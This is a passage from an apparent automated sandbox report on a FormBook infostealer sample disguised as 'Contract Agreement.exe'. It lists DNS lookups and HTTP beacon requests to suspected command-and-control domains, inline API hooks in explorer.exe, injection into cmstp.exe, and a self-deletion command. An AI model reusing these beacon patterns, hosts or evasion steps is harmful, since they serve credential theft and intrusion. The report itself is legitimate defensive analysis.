                                          Apr 12, 2021 13:50:53.553297043 CEST53497148.8.8.8192.168.2.4
                                          Apr 12, 2021 13:50:55.215186119 CEST5802853192.168.2.48.8.8.8
                                          Apr 12, 2021 13:50:55.264091969 CEST53580288.8.8.8192.168.2.4
                                          Apr 12, 2021 13:50:56.115535021 CEST5309753192.168.2.48.8.8.8
                                          Apr 12, 2021 13:50:56.166321993 CEST53530978.8.8.8192.168.2.4
                                          Apr 12, 2021 13:50:56.967892885 CEST4925753192.168.2.48.8.8.8
                                          Apr 12, 2021 13:50:57.017299891 CEST53492578.8.8.8192.168.2.4
                                          Apr 12, 2021 13:50:57.976267099 CEST6238953192.168.2.48.8.8.8
                                          Apr 12, 2021 13:50:58.025047064 CEST53623898.8.8.8192.168.2.4
                                          Apr 12, 2021 13:50:58.923787117 CEST4991053192.168.2.48.8.8.8
                                          Apr 12, 2021 13:50:58.977454901 CEST53499108.8.8.8192.168.2.4
                                          Apr 12, 2021 13:50:59.742469072 CEST5585453192.168.2.48.8.8.8
                                          Apr 12, 2021 13:50:59.794214964 CEST53558548.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:14.706685066 CEST6454953192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:14.755321980 CEST53645498.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:22.559405088 CEST6315353192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:22.618643999 CEST53631538.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:24.463193893 CEST5299153192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:24.516391993 CEST53529918.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:29.051762104 CEST5370053192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:29.110260963 CEST53537008.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:44.948786974 CEST5172653192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:45.094180107 CEST53517268.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:45.661676884 CEST5679453192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:45.784434080 CEST53567948.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:46.331386089 CEST5653453192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:46.382626057 CEST5662753192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:46.391937017 CEST53565348.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:46.450411081 CEST53566278.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:46.795838118 CEST5662153192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:46.854296923 CEST53566218.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:47.407198906 CEST6311653192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:47.468872070 CEST53631168.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:48.079483032 CEST6407853192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:48.139570951 CEST53640788.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:48.691521883 CEST6480153192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:48.881952047 CEST53648018.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:49.048284054 CEST6172153192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:49.112219095 CEST53617218.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:49.603454113 CEST5125553192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:49.665858984 CEST53512558.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:50.631102085 CEST6152253192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:50.693525076 CEST53615228.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:51.400646925 CEST5233753192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:51.458116055 CEST53523378.8.8.8192.168.2.4
                                          Apr 12, 2021 13:51:57.929265022 CEST5504653192.168.2.48.8.8.8
                                          Apr 12, 2021 13:51:58.152942896 CEST53550468.8.8.8192.168.2.4
                                          Apr 12, 2021 13:52:00.546367884 CEST4961253192.168.2.48.8.8.8
                                          Apr 12, 2021 13:52:00.605403900 CEST53496128.8.8.8192.168.2.4
                                          Apr 12, 2021 13:52:18.802992105 CEST4928553192.168.2.48.8.8.8
                                          Apr 12, 2021 13:52:19.141654015 CEST53492858.8.8.8192.168.2.4
                                          Apr 12, 2021 13:52:32.890613079 CEST5060153192.168.2.48.8.8.8
                                          Apr 12, 2021 13:52:32.943753958 CEST53506018.8.8.8192.168.2.4
                                          Apr 12, 2021 13:52:34.582506895 CEST6087553192.168.2.48.8.8.8
                                          Apr 12, 2021 13:52:34.648024082 CEST53608758.8.8.8192.168.2.4
                                          Apr 12, 2021 13:52:37.992042065 CEST5644853192.168.2.48.8.8.8
                                          Apr 12, 2021 13:52:38.072150946 CEST53564488.8.8.8192.168.2.4
                                          Apr 12, 2021 13:53:00.445595026 CEST5917253192.168.2.48.8.8.8
                                          Apr 12, 2021 13:53:00.546025991 CEST53591728.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Apr 12, 2021 13:51:57.929265022 CEST192.168.2.48.8.8.80x4da1Standard query (0)www.sapanyc.comA (IP address)IN (0x0001)
                                          Apr 12, 2021 13:52:18.802992105 CEST192.168.2.48.8.8.80x103aStandard query (0)www.bizcert360.comA (IP address)IN (0x0001)
                                          Apr 12, 2021 13:52:37.992042065 CEST192.168.2.48.8.8.80x5eddStandard query (0)www.protocolmodern.comA (IP address)IN (0x0001)
                                          Apr 12, 2021 13:53:00.445595026 CEST192.168.2.48.8.8.80x9b4dStandard query (0)www.nyariorganics.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Apr 12, 2021 13:51:58.152942896 CEST8.8.8.8192.168.2.40x4da1No error (0)www.sapanyc.com142.111.179.147A (IP address)IN (0x0001)
                                          Apr 12, 2021 13:52:19.141654015 CEST8.8.8.8192.168.2.40x103aNo error (0)www.bizcert360.combizcert360.comCNAME (Canonical name)IN (0x0001)
                                          Apr 12, 2021 13:52:19.141654015 CEST8.8.8.8192.168.2.40x103aNo error (0)bizcert360.com72.52.251.1A (IP address)IN (0x0001)
                                          Apr 12, 2021 13:52:38.072150946 CEST8.8.8.8192.168.2.40x5eddName error (3)www.protocolmodern.comnonenoneA (IP address)IN (0x0001)
                                          Apr 12, 2021 13:53:00.546025991 CEST8.8.8.8192.168.2.40x9b4dName error (3)www.nyariorganics.comnonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.sapanyc.com
                                          • www.bizcert360.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.449750142.111.179.14780C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 12, 2021 13:51:58.358808994 CEST3244OUTGET /klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loA HTTP/1.1
                                          Host: www.sapanyc.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Apr 12, 2021 13:51:58.561944008 CEST3247INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Mon, 12 Apr 2021 11:51:58 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 1.0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.44975672.52.251.180C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 12, 2021 13:52:19.304375887 CEST6729OUTGET /klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb84 HTTP/1.1
                                          Host: www.bizcert360.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Apr 12, 2021 13:52:19.876868010 CEST6730INHTTP/1.1 500 Internal Server Error
                                          Date: Mon, 12 Apr 2021 11:52:19 GMT
                                          Server: Apache
                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                          Vary: Accept-Encoding,User-Agent
                                          Connection: close
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 61 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 33 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 33 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 33 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 33 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73
                                          Data Ascii: aef<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><meta name='robots' content='noindex,follow' /><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.13);box-shadow: 0 1px 3px rgba(0, 0, 0, 0.13);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Cons


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: Contract Agreement.exe PID: 7012 Parent PID: 5864

                                          General

                                          Start time:13:50:58
                                          Start date:12/04/2021
                                          Path:C:\Users\user\Desktop\Contract Agreement.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\Contract Agreement.exe'
                                          Imagebase:0x400000
                                          File size:228086 bytes
                                          MD5 hash:75612F2E3922D80AFE14068C3A510C99
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: Contract Agreement.exe PID: 7056 Parent PID: 7012

                                          General

                                          Start time:13:50:59
                                          Start date:12/04/2021
                                          Path:C:\Users\user\Desktop\Contract Agreement.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\Contract Agreement.exe'
                                          Imagebase:0x400000
                                          File size:228086 bytes
                                          MD5 hash:75612F2E3922D80AFE14068C3A510C99
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 7056

                                          General

                                          Start time:13:51:04
                                          Start date:12/04/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: cmstp.exe PID: 5784 Parent PID: 3424

                                          General

                                          Start time:13:51:17
                                          Start date:12/04/2021
                                          Path:C:\Windows\SysWOW64\cmstp.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\cmstp.exe
                                          Imagebase:0x310000
                                          File size:82944 bytes
                                          MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Analysis Process: cmd.exe PID: 2016 Parent PID: 5784

                                          General

                                          Start time:13:51:21
                                          Start date:12/04/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\Contract Agreement.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 6004 Parent PID: 2016

                                          General

                                          Start time:13:51:21
                                          Start date:12/04/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >